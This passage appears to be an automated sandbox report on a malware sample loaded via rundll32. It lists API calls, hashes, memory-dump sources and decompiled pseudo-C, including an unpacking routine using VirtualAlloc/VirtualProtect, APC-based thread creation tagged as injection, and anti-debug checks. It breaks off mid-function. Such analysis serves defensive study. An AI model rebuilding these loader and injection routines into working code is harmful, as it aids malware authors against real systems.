Part of subcall function 030E1060: GetProcAddress.KERNEL32(00000000,?), ref: 030E10D2
Part of subcall function 030E1060: GetProcAddress.KERNEL32(00000000,?), ref: 030E10E8
Part of subcall function 030E1060: GetProcAddress.KERNEL32(00000000,?), ref: 030E10FE

Part of subcall function 030E1A5A: memcpy.NTDLL(00000000,00000002,030E148E,?,?,?,?,?,030E148E,?,?,?,?,?,?,00000002), ref: 030E1A87
Part of subcall function 030E1A5A: memcpy.NTDLL(00000000,00000002,?,00000002,00000000,?,?), ref: 030E1ABA

Part of subcall function 030E1F7C: LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 030E1FB4

Part of subcall function 030E126D: VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,00000002), ref: 030E12A6
Part of subcall function 030E126D: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 030E131B
Part of subcall function 030E126D: GetLastError.KERNEL32 ref: 030E1321

GetLastError.KERNEL32(?,?), ref: 030E14C2

Memory Dump Source

Source File: 00000004.00000002.480861932.00000000030E1000.00000020.00020000.sdmp, Offset: 030E0000, based on PE: true

Associated: 00000004.00000002.480836634.00000000030E0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480885021.00000000030E3000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480912036.00000000030E5000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480971189.00000000030E6000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$ErrorLastProtectVirtualmemcpy$HandleLibraryLoadModule
String ID:
API String ID: 2673762927-0
Opcode ID: 1d92745ce2084c265ecb2d1b41a3101056fb822ed4597eb83853c40493a538fa
Instruction ID: 338a30d8aaa179e1d89955a46b18875bc797fc6bbb053fbb5a262f2f8b8ae0fd
Opcode Fuzzy Hash: 1d92745ce2084c265ecb2d1b41a3101056fb822ed4597eb83853c40493a538fa
Instruction Fuzzy Hash: 6911227B7037056FD724EAA9CC80DEB77FCAF845047044595E9459B641E6B0ED064790

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0311B8F0, Relevance: 7.6, APIs: 5, Instructions: 58COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 031251CB
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 031251E2
UnhandledExceptionFilter.KERNEL32(0314CAC0), ref: 031251ED
GetCurrentProcess.KERNEL32(C0000409), ref: 0312520B
TerminateProcess.KERNEL32(00000000), ref: 03125212

Memory Dump Source

Source File: 00000004.00000002.481000123.00000000030EE000.00000020.00020000.sdmp, Offset: 030EE000, based on PE: false

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: ced6c7e0e54001b5588efb3bedcd91e2405e45ce2687bb9fd7fb3ae60d57abc1
Instruction ID: f4331f0798c5f476896e7c37c27baf3958e4668c330f215b8144a4a88e281777
Opcode Fuzzy Hash: ced6c7e0e54001b5588efb3bedcd91e2405e45ce2687bb9fd7fb3ae60d57abc1
Instruction Fuzzy Hash: 77210BB8941704CFC308FFA9E8846843BB4BB4C705F40852AE81A83249E7B196D1CF7A

Uniqueness

Uniqueness Score: -1.00%

Function 0311EE50, Relevance: 9.2, APIs: 6, Instructions: 240COMMON

Download Yara Rule

APIs

getSystemCP.LIBCMTD ref: 0311EE65

Part of subcall function 0311ED40: GetOEMCP.KERNEL32(00000000,031531E0,03133658,000000FF,?,0311EB06,?), ref: 0311ED99
Part of subcall function 0311ED40: _LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 0311EDAC

setSBCS.LIBCMTD ref: 0311EE7A
setSBUpLow.LIBCMTD ref: 0311EFD6

Memory Dump Source

Source File: 00000004.00000002.481000123.00000000030EE000.00000020.00020000.sdmp, Offset: 030EE000, based on PE: false

Similarity

API ID: Locale$SystemUpdateUpdate::~_
String ID:
API String ID: 2101441384-0
Opcode ID: 51490f65224aeced895db3a277b16b11156a45c2e176f3b09c945c65def0e027
Instruction ID: 92ce71f9e3fb4ea3df7b136d1427bd7d233ffbd4a607b5a28b44e3c397ba75a2
Opcode Fuzzy Hash: 51490f65224aeced895db3a277b16b11156a45c2e176f3b09c945c65def0e027
Instruction Fuzzy Hash: B8B11A74904259DFCB08CF94C854AEDBBB1BF48304F18C6A9E8265B341D375EAA5CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0312CEB0, Relevance: 9.1, APIs: 6, Instructions: 75COMMON

Download Yara Rule

APIs

___initconout.LIBCMTD ref: 0312CED2

Part of subcall function 03131470: CreateFileA.KERNEL32(03150900,40000000,00000003,00000000,00000003,00000000,00000000,?,0312CED7,?,?,?,03127436,?), ref: 03131487

GetConsoleOutputCP.KERNEL32(00000000,03127436,00000001,?,00000005,00000000,00000000,?,?,?,03127436,?), ref: 0312CF55
WideCharToMultiByte.KERNEL32(00000000,?,?,?,03127436,?), ref: 0312CF5C
WriteConsoleA.KERNEL32(031541C8,?,03127436,?,00000000,?,?,?,03127436,?), ref: 0312CF83

Memory Dump Source

Source File: 00000004.00000002.481000123.00000000030EE000.00000020.00020000.sdmp, Offset: 030EE000, based on PE: false

Similarity

API ID: Console$ByteCharCreateFileMultiOutputWideWrite___initconout
String ID:
API String ID: 3432720595-0
Opcode ID: 13c269b0c03e3ca58882cab36db66ddb2f2d9160b982f70be614e539e6856f0c
Instruction ID: 459ce62adc59ca4b3c957c79a6d54a2072a5185b29ca78b4a35de65385442ae7
Opcode Fuzzy Hash: 13c269b0c03e3ca58882cab36db66ddb2f2d9160b982f70be614e539e6856f0c
Instruction Fuzzy Hash: BE218335600315EFDB28EFA6E984BEE3B78AB0C715F100269E715960C8DF7051D4DBA6

Uniqueness

Uniqueness Score: -1.00%

Function 03155588, Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 228COMMON

Download Yara Rule

APIs

GetEnvironmentVariableA.KERNEL32(0314A680,03154200,00000718), ref: 03155709
VirtualProtectEx.KERNEL32(000000FF,?,0000301F,00000040,?), ref: 03155771

Strings

@, xrefs: 0315559D
G, xrefs: 03155597
T, xrefs: 03155590

Memory Dump Source

Source File: 00000004.00000002.481379048.0000000003154000.00000040.00020000.sdmp, Offset: 03154000, based on PE: false

Similarity

API ID: EnvironmentProtectVariableVirtual
String ID: @$G$T
API String ID: 3849859166-1505392691
Opcode ID: b5ebfdc892f0a7fd8d568fce90efddaa6653c80451a67e263cd9ec106da3c824
Instruction ID: 5e8a89d2042199a3a9c2630caf7efd139bce8bf9d38c430cec833ffd41e828f3
Opcode Fuzzy Hash: b5ebfdc892f0a7fd8d568fce90efddaa6653c80451a67e263cd9ec106da3c824
Instruction Fuzzy Hash: 91A1807A900324DFCB0CEFA8D850BAEBBB6BB8C354F448519E5A5A7348D7349584CB74

Uniqueness

Uniqueness Score: -1.00%

Function 03117630, Relevance: 6.1, APIs: 4, Instructions: 104COMMON

Download Yara Rule

APIs

std::_String_base::_Xlen.LIBCPMTD ref: 03117643

Part of subcall function 03118620: std::bad_exception::bad_exception.LIBCMTD ref: 03118660
Part of subcall function 03118620: __CxxThrowException@8.LIBCMTD ref: 0311866E

std::_String_base::_Xlen.LIBCPMTD ref: 0311766A
std::_String_base::_Xlen.LIBCPMTD ref: 03117681
_memcpy_s.LIBCMTD ref: 031176FA

Memory Dump Source

Source File: 00000004.00000002.481000123.00000000030EE000.00000020.00020000.sdmp, Offset: 030EE000, based on PE: false

Similarity

API ID: String_base::_Xlenstd::_$Exception@8Throw_memcpy_sstd::bad_exception::bad_exception
String ID:
API String ID: 649725542-0
Opcode ID: da8699e3ad0ce92a7cba2f435691a1b9777dfed02a1e85352a95ff36596fc585
Instruction ID: 5a6ebcb5984db62fdd837414e2b3b2e82c628d570eff3b4bd53f9899f118f6e0
Opcode Fuzzy Hash: da8699e3ad0ce92a7cba2f435691a1b9777dfed02a1e85352a95ff36596fc585
Instruction Fuzzy Hash: 9C31C1327107018BD320DE5DD8809ABF7E9DBA8261F14493EE5A287791E771E8A4C790

Uniqueness

Uniqueness Score: -1.00%

Function 030E1F10, Relevance: 6.0, APIs: 4, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E030E1F10() {
				void* _t1;
				long _t3;
				void* _t4;
				long _t5;
				void* _t6;
				intOrPtr _t8;

				_t8 =  *0x30e41b0;
				_t1 = CreateEventA(0, 1, 0, 0);
				 *0x30e41bc = _t1;
				if(_t1 == 0) {
					return GetLastError();
				}
				_t3 = GetVersion();
				if(_t3 <= 5) {
					_t4 = 0x32;
					return _t4;
				} else {
					 *0x30e41ac = _t3;
					_t5 = GetCurrentProcessId();
					 *0x30e41a8 = _t5;
					 *0x30e41b0 = _t8;
					_t6 = OpenProcess(0x10047a, 0, _t5);
					 *0x30e41a4 = _t6;
					if(_t6 == 0) {
						 *0x30e41a4 =  *0x30e41a4 | 0xffffffff;
					}
					return 0;
				}
			}

0x030e1f11
0x030e1f1f
0x030e1f27
0x030e1f2c
0x030e1f76
0x030e1f76
0x030e1f2e
0x030e1f36
0x030e1f72
0x030e1f74
0x030e1f38
0x030e1f38
0x030e1f3d
0x030e1f4b
0x030e1f50
0x030e1f56
0x030e1f5e
0x030e1f63
0x030e1f65
0x030e1f65
0x030e1f6f
0x030e1f6f

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,030E1C8E,74B063F0,00000000), ref: 030E1F1F
GetVersion.KERNEL32 ref: 030E1F2E
GetCurrentProcessId.KERNEL32 ref: 030E1F3D
OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 030E1F56

Memory Dump Source

Source File: 00000004.00000002.480861932.00000000030E1000.00000020.00020000.sdmp, Offset: 030E0000, based on PE: true

Associated: 00000004.00000002.480836634.00000000030E0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480885021.00000000030E3000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480912036.00000000030E5000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480971189.00000000030E6000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$CreateCurrentEventOpenVersion
String ID:
API String ID: 845504543-0
Opcode ID: efe9a5d9e7713b423ffea1634343c734fe5c83bb332456882f4a0abcc6f5969a
Instruction ID: 36ac93864fedb8bbbe498e93f031f3fd0f5b131603ecb7adda30d9a4ce17b519
Opcode Fuzzy Hash: efe9a5d9e7713b423ffea1634343c734fe5c83bb332456882f4a0abcc6f5969a
Instruction Fuzzy Hash: 4FF04479787200AEEBA4BB6BB8197853FA4A704F12F08009AF291CE1C8D3B840419B84

Uniqueness

Uniqueness Score: -1.00%

Function 031205D0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__encode_pointer.LIBCMTD ref: 03120644
_ValidateRead.LIBCMTD ref: 03120659

Strings

csm, xrefs: 031205D9

Memory Dump Source

Source File: 00000004.00000002.481000123.00000000030EE000.00000020.00020000.sdmp, Offset: 030EE000, based on PE: false

Similarity

API ID: ReadValidate__encode_pointer
String ID: csm
API String ID: 977738414-1018135373
Opcode ID: 908b86d6752c361585f0d4a861ed8846c33dfadce7447260e7f1e14da1ebdcaf
Instruction ID: ab698e5d18fe5f1d44d07ea10649cc568bf71ba18e8c12bffd9a792283ab7eb1
Opcode Fuzzy Hash: 908b86d6752c361585f0d4a861ed8846c33dfadce7447260e7f1e14da1ebdcaf
Instruction Fuzzy Hash: 10116D75A00214DFCB18CF64E45496ABFB9AF8C205F584298E8494F351DB31EEE1CBD1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 3040 Parent PID: 5364 rundll32.exeCOMMON

Executed Functions

Function 049E4F71, Relevance: 13.8, APIs: 9, Instructions: 318memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,00000941,00003000,00000040,00000941,049E49C8), ref: 049E502E
VirtualAlloc.KERNEL32(00000000,00000056,00003000,00000040,049E4A2A), ref: 049E5065
VirtualAlloc.KERNEL32(00000000,0000C27B,00003000,00000040), ref: 049E50C5
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 049E50FB
VirtualProtect.KERNEL32(04970000,00000000,00000004,049E4F50), ref: 049E5200
VirtualProtect.KERNEL32(04970000,00001000,00000004,049E4F50), ref: 049E5227
VirtualProtect.KERNEL32(00000000,?,00000002,049E4F50), ref: 049E52F4
VirtualProtect.KERNEL32(00000000,?,00000002,049E4F50,?), ref: 049E534A
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 049E5366

Memory Dump Source

Source File: 00000006.00000002.481698237.00000000049E4000.00000040.00020000.sdmp, Offset: 049E4000, based on PE: false

Similarity

API ID: Virtual$Protect$Alloc$Free
String ID:
API String ID: 2574235972-0
Opcode ID: 32be68320190b8bb7228a8e069a5c313f1a90531dfc18a59675f2d3a529aa34d
Instruction ID: 947891673dc97689e967eaab4e244fe3041645f3a0941ba14723ff77ac6c6526
Opcode Fuzzy Hash: 32be68320190b8bb7228a8e069a5c313f1a90531dfc18a59675f2d3a529aa34d
Instruction Fuzzy Hash: EBD1BF73500600AFDB15CF56C9C0B6277A6FF58324B0D61A4ED899FB5AE371B850CB62

Uniqueness

Uniqueness Score: -1.00%

Function 049A5A90, Relevance: 6.3, APIs: 1, Strings: 2, Instructions: 1084COMMON

Download Yara Rule

Strings

I#, xrefs: 049A647A
#, xrefs: 049A6649

Memory Dump Source

Source File: 00000006.00000002.481432541.000000000497E000.00000020.00020000.sdmp, Offset: 0497E000, based on PE: false

Similarity

API ID:
String ID: #$I#
API String ID: 0-3815891943
Opcode ID: c606e89b300fd50c817b91301698385459769fb8bfa57d11df0f659dff29d782
Instruction ID: 288e32887c0dd89ea16112d2efc619c6677a82c4bea5b6e16e4508e02e813694
Opcode Fuzzy Hash: c606e89b300fd50c817b91301698385459769fb8bfa57d11df0f659dff29d782
Instruction Fuzzy Hash: 83A29C72908251DFC734CF2AE584264BFB6E785316B0A453EDC849F251E338AE5ACF91

Uniqueness

Uniqueness Score: -1.00%

Function 04971C7D, Relevance: 15.1, APIs: 10, Instructions: 103
threadsleepsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E04971C7D(intOrPtr _a4) {
				char _v28;
				struct _SYSTEMTIME _v44;
				char _v48;
				long _v52;
				long _v56;
				void* __edi;
				long _t21;
				int _t23;
				long _t26;
				long _t27;
				long _t31;
				intOrPtr _t39;
				intOrPtr _t44;
				signed int _t45;
				void* _t50;
				signed int _t54;
				void* _t56;
				intOrPtr* _t57;

				_t21 = E04971F10();
				_v52 = _t21;
				if(_t21 != 0) {
					L18:
					return _t21;
				} else {
					goto L1;
				}
				do {
					L1:
					GetSystemTime( &_v44);
					_t23 = SwitchToThread();
					asm("cdq");
					_t45 = 9;
					_t54 = _t23 + (_v44.wMilliseconds & 0x0000ffff) % _t45;
					_t26 = E049718AD(0, _t54); // executed
					_v56 = _t26;
					Sleep(_t54 << 5); // executed
					_t21 = _v56;
				} while (_t21 == 0xc);
				if(_t21 != 0) {
					goto L18;
				}
				_t27 = E04971ADB(_t45);
				_v52 = _t27;
				if(_t27 != 0) {
					L16:
					_t21 = _v52;
					if(_t21 == 0xffffffff) {
						_t21 = GetLastError();
					}
					goto L18;
				}
				if(_a4 != 0) {
					L11:
					_push(0);
					_t56 = E049713D1(E049714E8,  &_v28);
					if(_t56 == 0) {
						_v56 = GetLastError();
					} else {
						_t31 = WaitForSingleObject(_t56, 0xffffffff);
						_v56 = _t31;
						if(_t31 == 0) {
							GetExitCodeThread(_t56,  &_v56);
						}
						CloseHandle(_t56);
					}
					goto L16;
				}
				if(E0497134F(_t45,  &_v48) != 0) {
					 *0x49741b8 = 0;
					goto L11;
				}
				_t44 = _v48;
				_t57 = __imp__GetLongPathNameW;
				_t50 =  *_t57(_t44, 0, 0);
				if(_t50 == 0) {
					L9:
					 *0x49741b8 = _t44;
					goto L11;
				}
				_t15 = _t50 + 2; // 0x2
				_t39 = E04971B58(_t50 + _t15);
				 *0x49741b8 = _t39;
				if(_t39 == 0) {
					goto L9;
				} else {
					 *_t57(_t44, _t39, _t50);
					E0497142F(_t44);
					goto L11;
				}
			}

0x04971c89
0x04971c92
0x04971c96
0x04971d9e
0x04971da4
0x00000000
0x00000000
0x00000000
0x04971c9c
0x04971c9c
0x04971ca1
0x04971ca7
0x04971cb6
0x04971cb7
0x04971cba
0x04971cbd
0x04971cc6
0x04971cca
0x04971cd0
0x04971cd4
0x04971cdb
0x00000000
0x00000000
0x04971ce1
0x04971ce8
0x04971cec
0x04971d8f
0x04971d8f
0x04971d96
0x04971d98
0x04971d98
0x00000000
0x04971d96
0x04971cf5
0x04971d48
0x04971d48
0x04971d59
0x04971d5d
0x04971d8b
0x04971d5f
0x04971d62
0x04971d6a
0x04971d6e
0x04971d76
0x04971d76
0x04971d7d
0x04971d7d
0x00000000
0x04971d5d
0x04971d03
0x04971d42
0x00000000
0x04971d42
0x04971d05
0x04971d09
0x04971d14
0x04971d18
0x04971d3a
0x04971d3a
0x00000000
0x04971d3a
0x04971d1a
0x04971d1f
0x04971d26
0x04971d2b
0x00000000
0x04971d2d
0x04971d30
0x04971d33
0x00000000
0x04971d33

APIs

Part of subcall function 04971F10: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,04971C8E,74B063F0,00000000), ref: 04971F1F
Part of subcall function 04971F10: GetVersion.KERNEL32 ref: 04971F2E
Part of subcall function 04971F10: GetCurrentProcessId.KERNEL32 ref: 04971F3D
Part of subcall function 04971F10: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 04971F56

GetSystemTime.KERNEL32(?,74B063F0,00000000), ref: 04971CA1
SwitchToThread.KERNEL32 ref: 04971CA7

Part of subcall function 049718AD: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,00000000), ref: 04971903
Part of subcall function 049718AD: memcpy.NTDLL(?,?,?,?,?,?,00000000), ref: 049719C9

Sleep.KERNELBASE(00000000,00000000), ref: 04971CCA
GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 04971D12
GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 04971D30
WaitForSingleObject.KERNEL32(00000000,000000FF,049714E8,?,00000000), ref: 04971D62
GetExitCodeThread.KERNEL32(00000000,?), ref: 04971D76
CloseHandle.KERNEL32(00000000), ref: 04971D7D
GetLastError.KERNEL32(049714E8,?,00000000), ref: 04971D85
GetLastError.KERNEL32 ref: 04971D98

Memory Dump Source

Source File: 00000006.00000002.481362563.0000000004971000.00000020.00020000.sdmp, Offset: 04970000, based on PE: true

Associated: 00000006.00000002.481343195.0000000004970000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.481383401.0000000004973000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.481392562.0000000004975000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.481406639.0000000004976000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastLongNamePathProcessThread$AllocCloseCodeCreateCurrentEventExitHandleObjectOpenSingleSleepSwitchSystemTimeVersionVirtualWaitmemcpy
String ID:
API String ID: 1962885430-0
Opcode ID: b439edc1cf9a03a6536beca6cfad0ee3c89817e67b41366abe2d3ca4e5704c24
Instruction ID: a0ce9ec8d6ba8e960edcec07a7aeec4b58f595873a7bdfa923f9e80b245a1206
Opcode Fuzzy Hash: b439edc1cf9a03a6536beca6cfad0ee3c89817e67b41366abe2d3ca4e5704c24
Instruction Fuzzy Hash: 82317071508311AB9720EF75984A96F7BECFFC5654B104A3AFC50D2340EB34E904DBA6

Uniqueness

Uniqueness Score: -1.00%

Function 049B5220, Relevance: 10.8, APIs: 7, Instructions: 317COMMON

Download Yara Rule

APIs

GetStartupInfoA.KERNEL32(?), ref: 049B525E
GetFileType.KERNEL32(?), ref: 049B54C7

Memory Dump Source

Source File: 00000006.00000002.481432541.000000000497E000.00000020.00020000.sdmp, Offset: 0497E000, based on PE: false

Similarity

API ID: FileInfoStartupType
String ID:
API String ID: 3016745765-0
Opcode ID: 987e590f6f24bb1b36e8c5ba9340753b1501e37f4cedd637ebced659415cc2f7
Instruction ID: c83261d2fd91bf19c6424439025f5356edd917e65d0830be653c176b89a794e2
Opcode Fuzzy Hash: 987e590f6f24bb1b36e8c5ba9340753b1501e37f4cedd637ebced659415cc2f7
Instruction Fuzzy Hash: C8E12B74E04248DFDB24CFA8C594AADBBB5FB49319F25C26DD465AB382D734A841CF80

Uniqueness

Uniqueness Score: -1.00%

Function 04971DAE, Relevance: 9.1, APIs: 6, Instructions: 71
memoryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
				long _v8;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t9;
				void* _t10;
				void* _t18;
				void* _t23;
				void* _t36;

				_push(__ecx);
				_t9 = _a8;
				_v8 = 1;
				if(_t9 == 0) {
					_t10 = InterlockedDecrement(0x4974188);
					__eflags = _t10;
					if(_t10 == 0) {
						__eflags =  *0x497418c;
						if( *0x497418c != 0) {
							_t36 = 0x2328;
							while(1) {
								SleepEx(0x64, 1); // executed
								__eflags =  *0x4974198;
								if( *0x4974198 == 0) {
									break;
								}
								_t36 = _t36 - 0x64;
								__eflags = _t36;
								if(_t36 > 0) {
									continue;
								}
								break;
							}
							CloseHandle( *0x497418c);
						}
						HeapDestroy( *0x4974190);
					}
				} else {
					if(_t9 == 1 && InterlockedIncrement(0x4974188) == 1) {
						_t18 = HeapCreate(0, 0x400000, 0); // executed
						_t41 = _t18;
						 *0x4974190 = _t18;
						if(_t18 == 0) {
							L6:
							_v8 = 0;
						} else {
							 *0x49741b0 = _a4;
							asm("lock xadd [eax], edi");
							_push( &_a8);
							_t23 = E049713D1(E049720CE, E0497121C(_a12, 1, 0x4974198, _t41));
							 *0x497418c = _t23;
							if(_t23 == 0) {
								asm("lock xadd [esi], eax");
								goto L6;
							}
						}
					}
				}
				return _v8;
			}

0x04971db1
0x04971dbd
0x04971dbf
0x04971dc2
0x04971e38
0x04971e3e
0x04971e40
0x04971e42
0x04971e48
0x04971e4a
0x04971e4f
0x04971e52
0x04971e5d
0x04971e5f
0x00000000
0x00000000
0x04971e61
0x04971e64
0x04971e66
0x00000000
0x00000000
0x00000000
0x04971e66
0x04971e6e
0x04971e6e
0x04971e7a
0x04971e7a
0x04971dc4
0x04971dc5
0x04971de5
0x04971deb
0x04971ded
0x04971df2
0x04971e2e
0x04971e2e
0x04971df4
0x04971dfc
0x04971e03
0x04971e0d
0x04971e19
0x04971e20
0x04971e25
0x04971e2a
0x00000000
0x04971e2a
0x04971e25
0x04971df2
0x04971dc5
0x04971e87

APIs

InterlockedIncrement.KERNEL32(04974188), ref: 04971DD0
HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 04971DE5

Part of subcall function 049713D1: CreateThread.KERNEL32 ref: 049713E8
Part of subcall function 049713D1: QueueUserAPC.KERNELBASE(?,00000000,?), ref: 049713FD
Part of subcall function 049713D1: GetLastError.KERNEL32(00000000), ref: 04971408
Part of subcall function 049713D1: TerminateThread.KERNEL32(00000000,00000000), ref: 04971412
Part of subcall function 049713D1: CloseHandle.KERNEL32(00000000), ref: 04971419
Part of subcall function 049713D1: SetLastError.KERNEL32(00000000), ref: 04971422

InterlockedDecrement.KERNEL32(04974188), ref: 04971E38
SleepEx.KERNELBASE(00000064,00000001), ref: 04971E52
CloseHandle.KERNEL32 ref: 04971E6E
HeapDestroy.KERNEL32 ref: 04971E7A

Memory Dump Source

Source File: 00000006.00000002.481362563.0000000004971000.00000020.00020000.sdmp, Offset: 04970000, based on PE: true

Associated: 00000006.00000002.481343195.0000000004970000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.481383401.0000000004973000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.481392562.0000000004975000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.481406639.0000000004976000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
String ID:
API String ID: 2110400756-0
Opcode ID: 57a794a5f2eecc7fbf7049d382ed2ebb188c85eb383d89752b1e9cead2ffb894
Instruction ID: db3d23424ba1d41479ccd72674b4033729846aa978052ced8b1649cc7ee207d1
Opcode Fuzzy Hash: 57a794a5f2eecc7fbf7049d382ed2ebb188c85eb383d89752b1e9cead2ffb894
Instruction Fuzzy Hash: EF219371604315EBDB20AFA9EC89E5A7FADFB657A47100135F905D3240DB38AD00DB65

Uniqueness

Uniqueness Score: -1.00%

Function 049713D1, Relevance: 9.0, APIs: 6, Instructions: 32
threadinjectionCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E049713D1(long _a4, DWORD* _a12) {
				_Unknown_base(*)()* _v0;
				void* _t4;
				long _t6;
				long _t11;
				void* _t13;

				_t4 = CreateThread(0, 0, __imp__SleepEx,  *0x49741cc, 0, _a12); // executed
				_t13 = _t4;
				if(_t13 != 0) {
					_t6 = QueueUserAPC(_v0, _t13, _a4); // executed
					if(_t6 == 0) {
						_t11 = GetLastError();
						TerminateThread(_t13, _t11);
						CloseHandle(_t13);
						_t13 = 0;
						SetLastError(_t11);
					}
				}
				return _t13;
			}

0x049713e8
0x049713ee
0x049713f2
0x049713fd
0x04971405
0x0497140e
0x04971412
0x04971419
0x04971420
0x04971422
0x04971428
0x04971405
0x0497142c

APIs

CreateThread.KERNEL32 ref: 049713E8
QueueUserAPC.KERNELBASE(?,00000000,?), ref: 049713FD
GetLastError.KERNEL32(00000000), ref: 04971408
TerminateThread.KERNEL32(00000000,00000000), ref: 04971412
CloseHandle.KERNEL32(00000000), ref: 04971419
SetLastError.KERNEL32(00000000), ref: 04971422

Memory Dump Source

Source File: 00000006.00000002.481362563.0000000004971000.00000020.00020000.sdmp, Offset: 04970000, based on PE: true

Associated: 00000006.00000002.481343195.0000000004970000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.481383401.0000000004973000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.481392562.0000000004975000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.481406639.0000000004976000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
String ID:
API String ID: 3832013932-0
Opcode ID: 905d578db6ec9601f81d5a72e261f3367671f6205ba373161e5b59011eb20402
Instruction ID: 0ba4405edd9edfa92b5f2958742f74d1f35ddb79adf87b806c742aac838eb52a
Opcode Fuzzy Hash: 905d578db6ec9601f81d5a72e261f3367671f6205ba373161e5b59011eb20402
Instruction Fuzzy Hash: 61F01536249621BBD7325FA0AC4CF9FBF69FB09751F004424FA0991250D7298C10EBA2

Uniqueness

Uniqueness Score: -1.00%

Function 049A7A60, Relevance: 7.8, APIs: 5, Instructions: 327COMMON

Download Yara Rule

APIs

GetSystemDirectoryA.KERNEL32(00000000,00000718), ref: 049A7AC8
GetCurrentDirectoryA.KERNEL32(00000718,?,049E300C), ref: 049A7BB6
delete.LIBCMTD ref: 049A7EB5
std::_Lockit::_Lockit.LIBCPMTD ref: 049A7ED4
std::_Lockit::~_Lockit.LIBCPMTD ref: 049A7EFF

Memory Dump Source

Source File: 00000006.00000002.481432541.000000000497E000.00000020.00020000.sdmp, Offset: 0497E000, based on PE: false

Similarity

API ID: DirectoryLockitstd::_$CurrentLockit::_Lockit::~_Systemdelete
String ID:
API String ID: 4219208524-0
Opcode ID: 6caeceadfca69f53397664b1a87da27c5ea551a7a3bb45f50b06cfc41634cf1e
Instruction ID: 1d1c370817c1b291c5670a125b71dab9f3365254edf8de6db0f0109094f6d117
Opcode Fuzzy Hash: 6caeceadfca69f53397664b1a87da27c5ea551a7a3bb45f50b06cfc41634cf1e
Instruction Fuzzy Hash: E0D17C71A08201DFC324DF66E581A66BFAAF788315F14893ED8058B350E778ED19CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 049718AD, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 111
memoryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E049718AD(void* __edi, intOrPtr _a4) {
				intOrPtr _v8;
				char _v12;
				void* _v16;
				unsigned int _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				void* _v36;
				signed int _v40;
				signed char _v44;
				void* _v48;
				signed int _v56;
				signed int _v60;
				intOrPtr _t50;
				void* _t57;
				void* _t61;
				signed int _t67;
				signed char _t69;
				signed char _t70;
				void* _t76;
				intOrPtr _t77;
				unsigned int _t82;
				intOrPtr _t86;
				intOrPtr* _t89;
				intOrPtr _t90;
				void* _t91;
				signed int _t93;

				_t90 =  *0x49741b0;
				_t50 = E04971000(_t90,  &_v28,  &_v20);
				_v24 = _t50;
				if(_t50 == 0) {
					asm("sbb ebx, ebx");
					_t67 =  ~( ~(_v20 & 0x00000fff)) + (_v20 >> 0xc);
					_t91 = _t90 + _v28;
					_v48 = _t91;
					_t57 = VirtualAlloc(0, _t67 << 0xc, 0x3000, 4); // executed
					_t76 = _t57;
					_v36 = _t76;
					if(_t76 == 0) {
						_v24 = 8;
					} else {
						_t69 = 0;
						if(_t67 <= 0) {
							_t77 =  *0x49741cc;
						} else {
							_t86 = _a4;
							_v8 = _t91;
							_v8 = _v8 - _t76;
							_t14 = _t86 + 0x4975137; // 0xc7b49ffa
							_t61 = _t57 - _t91 + _t14;
							_v16 = _t76;
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t70 = _t69 + 1;
								_v44 = _t70;
								_t82 = (_v60 ^ _v56) + _v28 + _a4 >> _t70;
								if(_t82 != 0) {
									_v32 = _v32 & 0x00000000;
									_t89 = _v16;
									_v12 = 0x400;
									do {
										_t93 =  *((intOrPtr*)(_v8 + _t89));
